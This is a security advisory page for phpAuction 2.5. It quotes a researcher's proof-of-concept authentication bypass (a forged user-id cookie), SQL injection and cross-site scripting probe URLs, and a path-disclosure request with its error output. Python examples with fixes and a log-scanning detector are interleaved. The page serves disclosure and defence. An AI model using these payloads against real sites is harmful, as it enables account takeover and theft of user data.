SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   PhpAuction
Vendors:   Phpauction.org
phpAuction Bugs Let Remote Users Conduct Cross-Site Scripting and SQL Injection Attacks and Bypass Authentication
SecurityTracker Alert ID:  1014423
SecurityTracker URL:  http://securitytracker.com/id/1014423
CVE Reference:   CVE-2005-2252, CVE-2005-2253, CVE-2005-2254, CVE-2005-2255
Updated:  Jun 16 2008
Original Entry Date:  Jul 8 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  

Description:   Diabolic Crab reported several vulnerabilities in phpAuction. A remote user can bypass authentication to access a target user's account. A remote user can conduct cross-site scripting attacks and inject SQL commands. A remote user can also determine the installation path.

A remote user can set the 'PHPAUCTION_RM_ID' cookie value to the ID number of the target user to bypass authentication and gain access to a target user's account.
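The weakness here is that the cookie carries nothing but the numeric user id, so any client that knows an id can present it. The following Python is an added illustration, not code from the advisory or from phpAuction: it contrasts that scheme with a cookie bound to a server-side HMAC key, so a value minted without the key is rejected. The key handling, the function names and the nonce layout are assumptions made for the example; a production fix would more usually issue an opaque random session id and keep the mapping to the user server-side.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret. In a real deployment it comes from
# configuration, never from source code, and is rotated on compromise.
SERVER_KEY = secrets.token_bytes(32)


def forged_bare_id_cookie(target_user_id):
    """The scheme the advisory describes: the cookie is just the user id,
    so it can be produced by anyone who has seen the id on a profile page."""
    return str(target_user_id)


def login_from_bare_id_cookie(cookie):
    """Server logic that trusts the bare id; returns the id it 'authenticated'."""
    return int(cookie)


def make_signed_cookie(user_id, key=SERVER_KEY):
    """Bind the id to a MAC under the server key; a nonce makes each login's
    cookie distinct so one captured value cannot be reused indefinitely."""
    payload = f"{user_id}:{secrets.token_hex(8)}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def login_from_signed_cookie(cookie, key=SERVER_KEY):
    """Return the user id only if the MAC verifies; None for a bare id,
    a tampered payload, or a malformed cookie."""
    try:
        payload, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    return int(payload.split(":", 1)[0])


if __name__ == "__main__":
    print("bare id accepted as:", login_from_bare_id_cookie(forged_bare_id_cookie(158)))
    print("bare id under signed scheme:", login_from_signed_cookie("158"))
    print("signed cookie round-trip:", login_from_signed_cookie(make_signed_cookie(158)))
```

The point of the contrast is that the server can only distinguish "a cookie it issued" from "a cookie the client made up" if issuing involves a secret the client does not hold; an id alone carries no such evidence.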

The 'adsearch.php' script does not properly validate user-supplied input in the 'category' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION
&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on
&payment%5B%5D=on&seller=1&country=Afghanistan&ending=1&SortProperty=ends
&type=2&action=search&go=GO%20%3E%3E

The 'id' parameter of 'viewnews.php' is also affected.
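Both reports have the same root cause: the request value is pasted into the SQL text. The following added example (not phpAuction's code; it uses an in-memory SQLite table with constructed rows standing in for the MySQL tables the advisory's error output names) runs the advisory's `'SQL_INJECTION` probe against a concatenated query and against a parameterised one, so the syntax error the advisory quotes can be seen beside the behaviour of a query that treats the value purely as data.

```python
import sqlite3


def make_db():
    """Constructed in-memory table playing the role of the auction listings."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE auctions (id INTEGER PRIMARY KEY, title TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO auctions (title, category) VALUES (?, ?)",
        [("Old radio", "electronics"), ("Oak chair", "furniture")],
    )
    return conn


def search_vulnerable(conn, category):
    """The pattern behind the report: the parameter becomes part of the SQL text,
    so a quote character changes the statement's structure."""
    sql = f"SELECT title FROM auctions WHERE category='{category}'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, category):
    """The fix: the statement is fixed, the value is bound separately and can
    never be parsed as SQL, whatever characters it contains."""
    sql = "SELECT title FROM auctions WHERE category=?"
    return [row[0] for row in conn.execute(sql, (category,))]


def run_search(search_fn, conn, category):
    """Run one search and report either ('rows', [...]) or ('error', message),
    mirroring the distinction visible in the advisory's PHP output."""
    try:
        return ("rows", search_fn(conn, category))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    probe = "'SQL_INJECTION"          # the advisory's own probe value
    print("concatenated:", run_search(search_vulnerable, make_db(), probe))
    print("parameterised:", run_search(search_parameterized, make_db(), probe))
    print("normal query:", search_parameterized(make_db(), "furniture"))
```

The error path is itself informative: the advisory's PHP output leaked the table name and the full statement to the client, which is why the parameterised form should be paired with error display turned off and errors logged server-side instead.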

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the vulnerable software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>

/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>

/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159

/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>

/login.php?username=<script>alert(document.cookie)</script>

/viewnews.php?id=<script>alert(document.cookie)</script>
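Every one of these URLs reflects a request parameter into the page unencoded. The fix is to encode each reflected value for the context it is written into, which differs between HTML text, a quoted attribute and a URL. The following Python is an added example, not code from the page or the project; the page fragments and the function names are constructed, and the payload is the one the advisory uses.

```python
import html
from urllib.parse import quote


def render_vulnerable(username):
    """The pattern behind the reported bugs: the parameter is written into the
    page as-is, so markup in it becomes part of the document."""
    return f"<p>Welcome back, {username}</p>"


def render_escaped(username, lan):
    """Encode each reflected value for the context it lands in:
    HTML text, a double-quoted attribute, and a URL query component."""
    text = html.escape(username, quote=False)   # < > & become entities
    attr = html.escape(username, quote=True)    # additionally " and ' so the attribute cannot be closed
    url_part = quote(lan, safe="")              # percent-encode for the query string
    return (
        f"<p>Welcome back, {text}</p>\n"
        f'<input type="text" name="username" value="{attr}">\n'
        f'<a href="/index.php?lan={url_part}">switch language</a>'
    )


def contains_raw_script(markup):
    """Helper for checking output: True if a literal script tag survived."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"   # the advisory's payload
    print(render_vulnerable(payload))
    print(render_escaped(payload, payload))
```

Encoding at output time, per context, is what makes the reflected value inert regardless of what was submitted; filtering on input, which the advisory describes as missing, is a weaker substitute because the same value may be rendered in several contexts.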

A remote user can supply URLs of the following type to cause the system to disclose the installation path.

/phpauction-gpl-2.5/index.php?lan=../put/.inc.php/file/name/here

/phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here
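The quoted error output shows the `lan` value being spliced into an include filename of the form `includes/messages.<lan>.inc.php`, and the failed include then echoes the full filesystem path to the client. The following Python is an added example, not phpAuction's code: it resolves a language name through an allowlist, confirms the resulting path stays inside the include directory, and falls back to a default instead of surfacing an error. The directory, the language list and the function names are assumptions made for the example.

```python
import posixpath

# Hypothetical install location; only the filename pattern is taken from the
# advisory's error output.
LANG_DIR = "/var/www/phpauction-gpl-2.5/includes"
# Constructed allowlist of installed language packs.
KNOWN_LANGS = frozenset({"english", "german", "spanish"})


def resolve_language_file(lan, lang_dir=LANG_DIR, known=KNOWN_LANGS):
    """Return the include path for a language name, or None if the name is not
    an installed pack or its path would fall outside lang_dir."""
    # Layer 1: allowlist. Anything not an installed pack is rejected outright,
    # so '../' sequences and odd suffixes never reach path construction.
    if lan not in known:
        return None
    # Layer 2: defence in depth. Even for an allowed name, confirm the
    # normalised path is still rooted in lang_dir.
    candidate = posixpath.normpath(posixpath.join(lang_dir, f"messages.{lan}.inc.php"))
    if posixpath.commonpath([lang_dir, candidate]) != lang_dir:
        return None
    return candidate


def language_file_or_default(lan):
    """What the request handler should do with an unknown value: use the
    default pack silently rather than emit a warning that reveals the layout."""
    return resolve_language_file(lan) or resolve_language_file("english")


if __name__ == "__main__":
    probe = "../put/.inc.php/file/name/here"   # the advisory's probe value
    print(resolve_language_file("english"))
    print(resolve_language_file(probe))
    print(language_file_or_default(probe))
```

The allowlist is the real control; the path check only guards against a future mistake in how the allowlist is populated. Separately, the path disclosure in the advisory comes from PHP printing warnings to the page, so `display_errors` should be off in production and errors written to the log instead.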

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the phpAuction software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can determine the installation path.

A remote user can bypass authentication.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpauction.org/
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Bday Release] PhpAuction has Authentication Bypass, Multiple Sql injection, Cross Site Scripting and File Include vulnerabilities


Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies
 
******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND 
EMAILS TO DCRAB@HACKERSCENTER.COM
******************************
 
Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code 
them. Learn more at http://www.dbtech.org
 
Severity: High
Title: [Bday Release] PhpAuction has Authentication Bypass, Multiple Sql injection, 
Cross Site Scripting and File Include vulnerabilities
Date: 8/07/2005
 
Vendor: PhpAuction
Vendor Website: http://www.phpauction.org
Vendor Status: Contacted but no reply
Summary: There are Authentication Bypass, Multiple Sql injection, Cross Site 
Scripting and File Include vulnerabilities in PhpAuction.
 

Proof of Concept Exploits:
 
Authentication bypass
Set the cookie as follows,
Name: PHPAUCTION_RM_ID
VALUE: Id number of the user/admin you want to impersonate (you can get it from their 
profile)
Access the website, and you're instantly logged in as them ;)
 
/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION
&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on
&payment%5B%5D=on&seller=1&country=Afghanistan&ending=1&SortProperty=ends
&type=2&action=search&go=GO%20%3E%3E
 
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource 
in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/adsearch.php 
on line 33
 
/viewnews.php?id='SQL_INJECTION
Error: select * from PROSITE_news where id=\'SQL_INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL 
server version for the right syntax to use near '\'SQL_INJECTION' at line 1
 
/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159
Cross Site Scripting
 
/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/login.php?username=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/viewnews.php?id=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/phpauction-gpl-2.5/index.php?lan=../put/.inc.php/file/name/here
 
Warning: 
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): 
failed to open stream: No such file or directory in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php 
on line 34
 
Fatal error: main(): Failed opening required 
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' 
(include_path='.:/usr/local/lib/php') in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php 
on line 34
 

/phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here
 
Warning: 
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): 
failed to open stream: No such file or directory in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php 
on line 34
 
Fatal error: main(): Failed opening required 
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' 
(include_path='.:/usr/local/lib/php') in 
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php 
on line 34
 

Keep yourself updated, RSS feed at: http://digitalparadox.org/rss.ah and at 
http://www.hackerscenter.com
 
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: 
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me 
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or 
http://www.dbtech.org/. Look out for my soon to come out book on Secure coding with 
php.
 
 

Sincerely,
Diabolic Crab
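From the defender's side, the request patterns listed in this advisory are straightforward to recognise in web server access logs: a script tag in any parameter, a quote character in the `category` or `id` parameters the advisory names as injectable, and a traversal sequence in `lan`. The following Python is an added example, not part of the advisory or of phpAuction; the log lines are constructed in Common Log Format to mirror the advisory's URLs, and the rule names and parameter lists are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (Common Log Format) modelled on the request
# patterns in the advisory; none of these come from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jul/2005:10:00:01 +0000] "GET /phpauction-gpl-2.5/index.php?lan=english HTTP/1.1" 200 4821
203.0.113.7 - - [08/Jul/2005:10:00:09 +0000] "GET /phpauction-gpl-2.5/index.php?lan=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4911
203.0.113.7 - - [08/Jul/2005:10:00:17 +0000] "GET /viewnews.php?id=%27SQL_INJECTION HTTP/1.1" 200 1203
203.0.113.7 - - [08/Jul/2005:10:00:25 +0000] "GET /phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here HTTP/1.1" 200 877
198.51.100.3 - - [08/Jul/2005:10:01:02 +0000] "GET /adsearch.php?category=furniture&minprice=1&maxprice=50 HTTP/1.1" 200 6630
"""

# Extract the request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SQL_PARAMS = {"category", "id"}     # parameters the advisory reports as injectable
INCLUDE_PARAMS = {"lan"}            # parameter used to build the include filename


def classify_param(name, value):
    """Return the rule names one decoded parameter value triggers."""
    hits = []
    low = value.lower()
    if "<script" in low:
        hits.append("xss_script_tag")
    if name in SQL_PARAMS and "'" in value:
        hits.append("sqli_quote_probe")
    if name in INCLUDE_PARAMS and ("../" in value or "..\\" in value):
        hits.append("include_traversal")
    return hits


def scan_log(text):
    """Return one finding per (line, parameter, rule). Values are percent-decoded
    before matching so an encoded '<' or quote is treated the same as a raw one."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            for rule in classify_param(name, value):
                findings.append({"line": lineno, "param": name, "rule": rule})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['rule']} via parameter {f['param']!r}")
```

The quote rule is deliberately narrow, limited to the parameters the advisory names, because a bare apostrophe in free-text fields such as an auction title is normal traffic; widening it to every parameter would trade the low false-positive rate for noise. Decoding before matching matters because the advisory's own URLs arrive with `%5B%5D` and similar encodings, and a scanner that matches raw log text misses the encoded forms.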
 
 
Copyright 2020, SecurityGlobal.net LLC